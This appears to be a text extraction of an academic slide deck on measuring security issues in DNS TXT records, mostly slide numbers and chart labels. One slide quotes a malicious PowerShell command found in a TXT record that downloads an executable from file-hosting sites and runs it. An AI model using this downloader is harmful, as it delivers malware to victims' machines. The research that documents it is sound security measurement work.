TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records
- O. van der Toorn1
- R. van Rijswijk-Deij1
- T. Fiebig2
- M. Lindorfer3
- A. Sperotto1
2020-08-21
1University of Twente, 2TU Delft, and 3TU Wien
TXTing 101: Finding Security Issues in the Long Tail of DNS TXT - - PowerPoint PPT Presentation
TXTing 101: Finding Security Issues in the Long Tail of DNS TXT Records O. van der Toorn 1 R. van Rijswijk-Deij 1 T. Fiebig 2 M. Lindorfer 3 A. Sperotto 1 2020-08-21 1 University of Twente, 2 TU Delft, and 3 TU Wien DNS TXT Records 1 DNS TXT
1University of Twente, 2TU Delft, and 3TU Wien
1
2
3
4
4
4
4
5
5
5
6
6
2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07
20 M 40 M 60 M 80 M
Email Encoded Miscellaneous Other Patterns Verification 7
2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07
500 k 1 M
Malicious Mistakes Unclassified Undefined Purpose 8
9
9
9
10
11
12
13
13
14
14
15
2015-07 2016-01 2016-07 2017-01 2017-07 2018-01 2018-07 20 40 60 80 100 120
total private public
16
17
17
17
17
17
18
18
19
19
19
20
$a=(new-object net.webclient); $b=$Env:APPDATA; $w=$Env:WINDIR; $c=$b+\'//t.txt\'; $g=$b+\'//t.exe\'; $p=$w+\'//Microsoft.NET//Framework\'; if (gci -Path $p | where {$_.Name -like \'v4*\'}) { try {$a.DownloadFile(\'https://filebin.ca/<CODE A>\', $c); ren $c t.exe; start $g } catch {$a.DownloadFile(\'https://files.fm/down.php?i=<CODE B>\', $c); ren $c t.exe; start $g } } else { try {$a.DownloadFile(\'https://filebin.ca/<CODE C>\', $c); ren $c t.exe; start $g } catch {$a.DownloadFile(\'https://files.fm/down.php?i=<CODE D>\', $c); ren $c t.exe; start $g } }; sleep 180; rm $g
21
2019-01 2019-03 2019-05 2019-07 2019-09 2019-11 2020-01 2020-03 2020-05 2020-07
Date
2 k 4 k 6 k 8 k 10 k 12 k 14 k
Number of records
2.19x more records 500 .top domains adding Zoom tokens
"regular" growth WHO publishes news on the virus Many countries start to enforce WFH TXT record count
22
23
23
23
24
24